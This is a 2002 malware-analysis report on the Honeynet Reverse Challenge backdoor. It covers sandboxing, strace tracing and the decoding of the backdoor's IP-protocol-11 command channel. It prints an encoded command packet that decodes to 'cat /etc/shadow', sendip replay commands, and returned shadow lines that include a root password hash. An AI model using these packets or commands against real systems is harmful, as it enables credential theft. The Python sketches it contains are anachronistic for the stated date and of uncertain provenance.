Report: hostile code analysis methodology

Beginning on 6 May 2002, I ran various analyses of "the-binary" released by Honeynet.org as the primary content of the Reverse Challenge.

Operating environment

Analysis

  1. preliminary setup/testing
  2. The first step in the analysis was to establish safe containment and perform an initial review of the binary's capabilities. An existing VMware 'guest' virtual machine was copied and archived so that persistent data could later be compared against a known starting point. The guest VM was initially set up with no network connectivity at all, and the-binary was run from a root command line. Diagnostics follow:

    ps output:
    USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
    root     10527  0.0  0.0   244   72 ?        S    09:28   0:00 [mingetty]  
    
    netstat -an output:
    Proto Recv-Q Send-Q Local Address           Foreign Address         State 
    raw        0      0 0.0.0.0:11              0.0.0.0:*               7           
    
    lsof output:
    malcode   31923 root  cwd    DIR    8,2    1024          2 /
    malcode   31923 root  rtd    DIR    8,2    1024          2 /
    malcode   31923 root  txt    REG    8,2  205108      30258 /root/malcode
    malcode   31923 root    0u   raw                      1673 00000000:000B->00000000:0000 st=07
    grep      31932 root    1w   REG    8,2       0      30259 /root/malcode.notes
    
  3. initial checks of structure and operation
  4. I started the analysis by using simple tools to inspect the binary, then delved progressively deeper into its behavior and design. The 'strings' command was used to look for the basic elements and to inspect for behavior keys (see bin.strings.txt). The following strings immediately stood out:

    malcode / trojan keys
      /tmp/.hj237349
      /bin/csh -f -c "%s" 1> %s 2>&1
      TfOjG
      *nazgul*
      /bin/csh -f -c "%s" 
    
    generic code keys
      @(#) The Linux C library 5.3.12
      nospoof
      RESOLV_SPOOF_CHECK
      gethostbyaddr: %s != %u.%u.%u.%u, possible spoof attempt
    

    Because the test system was running a minimal distribution that did not include the C shell, I built and installed tcsh from source and ran the code again to establish whether it used the shell to further compromise the operating system. This seemed not to be the case. I ran MD5 checksums of the system before and after each early test, checking that 'md5sum' and some other critical binaries had not been touched, modified, or accessed by the binary. From this point I narrowed the focus of the analysis mostly to the binary's operation and network traffic.
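
    The before/after checksum comparison described above can be sketched as follows. This is a minimal illustration, not the procedure actually used: the helper names and the WATCHED list are hypothetical, since the report names only 'md5sum' among the files it checked.

```python
import hashlib
from pathlib import Path


def md5_of(path):
    """Return the hex MD5 digest of one file, read in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(paths):
    """Map each existing regular file to its MD5 digest."""
    return {str(p): md5_of(p) for p in map(Path, paths) if p.is_file()}


def changed(before, after):
    """List files whose digest differs, or that appeared or vanished."""
    return sorted(p for p in before.keys() | after.keys()
                  if before.get(p) != after.get(p))


# Hypothetical watch list (assumption): only 'md5sum' is named in the report.
WATCHED = ["/usr/bin/md5sum", "/bin/ls", "/bin/ps", "/bin/netstat"]
```

    Taking snapshot(WATCHED) before a run and again afterwards, then passing both to changed(), lists any watched file whose contents differ. A checksum only detects modification; checking for mere access would need file timestamps as well.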

    I then adjusted the VMware settings, first to 'host-only' network access once it was clear that the analysis would require network connectivity, and eventually to a virtual 'NAT' network interface, allowing the binary to see the Internet through a controlled interface. For most of the testing the host OS was configured with iptables to disallow traffic on the binary's control channel, IP protocol 11.

  5. Disassembly / tracing
  6. I initially used objdump and gdb to inspect the binary's operation. I also built / installed 'bastard' to generate assembly listings. I found that I could trace the binary's execution using gdb only up to the point of the first 'fork()' system call. I was also able to attach to the running process with 'gdb'.

    I spent some time working with the disassembled code and obtained a feel for how the binary operated. At this point I set the project aside until the challenge released the network data for testing, expecting that it would be easier to use valid network traffic to analyse the operational behavior than to undertake a full-scale code analysis.

    The release of the second set of binary data coincided with the release of 'fenris', a tracing and debugging tool that included a useful set of notes on the operation of the binary.

    I replicated Michal Zalewski's results and chose to rely mostly on 'strace', which was able to trace the fork()-ed child processes, report all of the system calls and, critically, dump the data read from and written to files and the communication sockets.

    Using strace I was able to obtain a fairly thorough picture of how the code operates. Working on the sandboxed host, a typical command would be:

    strace -ff -o cmd_02 -e read=0,1,2,3,4 -e write=0,1,2,3,4 ./the-binary
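
    With '-ff' and '-o cmd_02', strace writes one trace file per process, named cmd_02.<pid>. A small sketch for pulling the execve() calls out of those files is shown here; the function name and the regular expression are illustrative assumptions, and the pattern is only an approximation of strace's line format (an argument containing "], " would be cut short).

```python
import glob
import re

# Approximate match for lines such as:
#   execve("/bin/csh", ["/bin/csh", "-f", "-c", "..."], ...) = 0
EXECVE = re.compile(r'^execve\("([^"]+)", \[(.*?)\], ')


def exec_calls(prefix):
    """Yield (trace_file, program, argv_text) for each execve() line found
    in the per-process trace files named <prefix>.<pid>."""
    for name in sorted(glob.glob(glob.escape(prefix) + ".*")):
        with open(name, errors="replace") as trace:
            for line in trace:
                match = EXECVE.match(line)
                if match:
                    yield name, match.group(1), match.group(2)
```

    Calling list(exec_calls("cmd_02")) in the directory holding the trace files gives a quick list of every program the binary's children tried to run.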

    I also forced the binary to core-dump at numerous points along the way, using 'xdump' and diff to generate comparison information on the state of the code in different execution runs.
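
    The dump-and-compare step can be approximated as below. This is a Python stand-in written for illustration, not the Perl 'xdump' script that was actually used; the function names are hypothetical, and the line layout simply copies the hex-dump style used elsewhere in this report.

```python
import difflib


def hexdump_lines(data, width=16):
    """Format bytes as offset, 4-byte hex groups, and printable ASCII."""
    lines = []
    for offset in range(0, len(data), width):
        row = data[offset:offset + width]
        groups = " ".join(row[i:i + 4].hex() for i in range(0, len(row), 4))
        text = "".join(chr(b) if 0x20 <= b <= 0x7e else "." for b in row)
        lines.append(f"{offset:08x}    {groups:<35}    {text}")
    return lines


def dump_diff(old, new, old_name="run_a", new_name="run_b"):
    """Return unified-diff lines between the hex dumps of two byte strings."""
    return list(difflib.unified_diff(hexdump_lines(old), hexdump_lines(new),
                                     old_name, new_name, lineterm=""))
```

    Reading two core files with open(path, "rb").read() and passing the results to dump_diff() shows only the 16-byte rows that differ between the two runs.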

    It is likely that this malware was developed as an addition to the 'nc' (netcat) source. The strings extracted match many of the strings that can be extracted from a current 'nc' binary, including 'warn', 'nowarn' and 'spoof'. It seems unlikely that the malware was attached to a copy of 'nc' as part of the hostile injection, as the significant strings are buried in the midst of the code.

  7. Network data decode
  8. Working from the server hosting the VMware sandbox, I found 'nc' (netcat) intractable for writing to the binary's raw socket, so I went looking for an alternative and found 'sendip'. After the 'command packets' were extracted from the supplied file 'snort.log', the following commands write that data to the sandboxed system and record the network traffic between the binary and its control station.

    sendip -p ipv4 -is 192.168.1.1 -ip 11 -ii 4095 -f 192.168.1.13

    tcpdump -s 1500 -w addrs.dat -i vmnet8 'host 192.168.1.13 and port not 22' &

    This records the network traffic between the binary and its controlling station, including the result data reported. I knew, both from the string data extracted from the binary and from the 'strace' data, that the code uses /bin/csh to execute the command injected over its control channel. It was therefore a simple matter to remove /bin/csh, which was only a symlink to /usr/bin/tcsh, and replace it with the following script:

    #!/bin/sh
    # (interpreter line assumed) invoked as: csh -f -c "cmd", so $3 holds the command
    echo $$ $* >> /root/.log
    exec $3 $4 $5

    This allows the plaintext to be extracted with 'tail -f /root/.log'. Using this approach to watch the binary's own decode output I created the following new data sets (hex-dump):

    
    Original: decodes to   "rpcinfo -p 127.0.0.1"
      00000000    02001731 ba41bb3b c03dc3fa 3ec5fc44    ...1.A.;.=..>..D
      00000010    8ddb2067 acf33880 97aec5dc f30a2138    .. g..8.......!8
      00000020    4f667d94 abc2d9f0 071e354c 637a91a8    Of}.......5Lcz..
    Trial:    decodes to:  "aaaaaaaaaaaaaaaaaaaaaa"
      00000000    02001731 a9219911 890179f1 69e159d1    ...1.!....y.i.Y.
      00000010    49c139b1 29a11991 09819861 78787878    I.9.)......axxxx
    Attack:   decodes to:  "cat /etc/shadow"
      00000000    02001731 ab23aee5 2ba732ac f27cfb73    ...1.#..+.2..|.s
      00000010    ee740239 acf33880 97787878 78787878    .t.9..8..xxxxxxx
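
    The dumps above are enough to guess at the encoding. In the Trial set every payload byte exceeds its predecessor by 0x78, which is 'a' (0x61) plus 0x17, suggesting that each encoded byte is the previous byte plus the plaintext byte plus 0x17, modulo 256. The sketch below is my reading of these dumps only, not a copy of decode.c; the constant, the start offset of 4 and the stop-at-NUL rule are all assumptions.

```python
KEY = 0x17  # additive constant inferred from the dumps above (assumption)


def decode_payload(packet, start=4):
    """Undo the running-sum encoding from offset `start` up to the first
    byte that decodes to NUL (or the end of the packet)."""
    out = bytearray()
    for i in range(start, len(packet)):
        value = (packet[i] - packet[i - 1] - KEY) & 0xFF
        if value == 0:
            break
        out.append(value)
    return out.decode("latin-1")


# The "Original" data set from the hex dump above.
ORIGINAL = bytes.fromhex(
    "02001731ba41bb3bc03dc3fa3ec5fc44"
    "8ddb2067acf3388097aec5dcf30a2138"
    "4f667d94abc2d9f0071e354c637a91a8"
)

print(decode_payload(ORIGINAL))  # prints: rpcinfo -p 127.0.0.1
```

    Because each byte is decoded relative to the one before it, a single wrong byte in a packet corrupts only the character at that position and the one after it.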
    
    

    The choice of IP addresses for this reporting is, as near as I can tell, made at random at activation and does not change within an instance. I find this odd (and presumably not very useful), but sending exactly identical 'wakeup' and 'command' sequences resulted in different outgoing IP connections in every instance, while within an instance the same half dozen targets were repeatedly accessed. I can only conclude that the targeting is either set by a separate command, which would require a more complete disassembly of the binary to identify, or is random.

    The binary accepts and transmits data in the following form:

    byte       value(s)   usage
    00         02|03      command
    01         00         n/a-fill?
    02         00-ff      stop-difference
    03         ??         unknown?
    04-stop    encoded    payload/command
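
    As a sketch only, the layout in the table can be expressed as a small record type. The field names are hypothetical labels for the table rows, and the meaning of bytes 02 and 03 is as uncertain here as it is in the table.

```python
from typing import NamedTuple


class ControlPacket(NamedTuple):
    command: int     # byte 00: 02 or 03 per the table
    fill: int        # byte 01: 00, apparently padding
    stop_diff: int   # byte 02: "stop-difference" (meaning uncertain)
    unknown: int     # byte 03: purpose not determined
    payload: bytes   # bytes 04 onward, still encoded


def split_packet(raw):
    """Split a raw control packet into the fields listed in the table."""
    if len(raw) < 4:
        raise ValueError("packet shorter than the 4-byte header")
    return ControlPacket(raw[0], raw[1], raw[2], raw[3], bytes(raw[4:]))
```

    For the first row of the Original data set, split_packet() yields command 0x02, fill 0x00, stop_diff 0x17 and unknown 0x31, with the remaining bytes left as the encoded payload.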

    The test data provided by the challenge includes control packets sent to the binary. These seem to consist of two 'wakeup' commands followed by a shell command. The shell command is run whenever it is received; however, the network replies are only initiated if the 'wakeups' have been sent beforehand.

  9. Result
  10. The packets returned by the binary include the results (or error messages) of the shell commands above. These can be decoded either by feeding them back to the binary (using 'sendip' and 'tail'-ing the log file from the fake version of 'csh'), or by using the decode program (decode.c). Either way the result is:
    
    Ġoot:$1$ON4/ZLzZ$nOYPr6JXSXMB2FYKZXYXl0:11765:0:99999:7:::
    daemon:x:11521:0:99999:7:::
    bin:x:11521:0:99999:7:::
    sys:x:11521:0:99999:7:::
    
    

    We can see that not all of the data from the shell command is returned (and which part is sent seems to be a moving target); the effective result, however, is that the data gets out.

  11. Foibles / questions
  12. The binary sometimes opens a raw socket on protocol 255:
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name   
    raw        0      0 0.0.0.0:255             0.0.0.0:*               7           10943/[mingetty]    
    
    This has typically occurred when sending random or invalid data to the sandboxed system while probing its operation. I tested that socket at one point by using 'sendip' to deliver data and watching the code's behavior with tcpdump. The binary does not seem ever to read any data from this socket. I presume it is either an unanalysed feature or a program bug.
    raw    65056      0 0.0.0.0:255             0.0.0.0:*               7           10943/[mingetty]    
    

    Additionally, there is the open question of why the binary's output packets, which include an encoded report of the output of the attacker's shell command, also carry plaintext in the output. I also found that a part of the command packet (about 100 bytes) is duplicated in the response packet after the encoded reply section.

Author / contact

Forrest Whitcher 31 May, 2002 fw_sec@fwsystems.com

References

http://www.sourceforge.net/projects/bastard
http://lcamtuf.coredump.cx/fenris/
http://www.earth.li/projectpurple/progs/sendip.html
Xdump, from Programming Perl, Larry Wall
iperl.pl (simple perl-shell, included: iperl.pl)

Copyright © 2002 FW Systems LLC, All Rights Reserved